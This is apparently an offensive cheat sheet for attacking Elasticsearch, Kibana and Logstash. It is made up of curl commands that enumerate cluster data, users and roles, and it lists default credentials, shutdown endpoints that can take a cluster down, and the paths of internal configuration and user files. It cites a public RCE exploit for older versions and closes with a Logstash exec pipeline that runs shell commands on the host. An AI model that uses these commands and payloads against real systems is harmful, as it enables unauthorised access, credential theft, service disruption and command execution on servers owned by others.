curl -X GET "ELASTICSEARCH-SERVER:9200/"
curl -X GET "ELASTICSEARCH-SERVER:9200/_xpack/security/user"
elastic:changeme kibana_system logstash_system beats_system apm_system remote_monitoring_user
/_cluster/health /_cat/indices /_cat/health
/_shutdown /_cluster/nodes/_master/_shutdown /_cluster/nodes/_shutdown /_cluster/nodes/_all/_shutdown
WITH CREDS
curl -H "Authorization: ApiKey " ELASTICSEARCH-SERVER:9200/
curl -X GET "ELASTICSEARCH-SERVER:9200/_security/user/"
curl -X GET "ELASTICSEARCH-SERVER:9200/_security/user"
curl -X GET "ELASTICSEARCH-SERVER:9200/_security/role
INTERNAL CONFIG FILES
Elasticsearch configuration: /etc/elasticsearch/elasticsearch.yml Kibana configuration: /etc/kibana/kibana.yml Logstash configuration: /etc/logstash/logstash.yml Filebeat configuration: /etc/filebeat/filebeat.yml Users file: /etc/elasticsearch/users_roles
Version < 6.6.0 = RCE (https://github.com/LandGrey/CVE-2019-7609/)
LOGSTASH BASIC
################### input { exec { command => "whoami" interval => 120 } }
output { file { path => "/tmp/output.log" codec => rubydebug } } ####################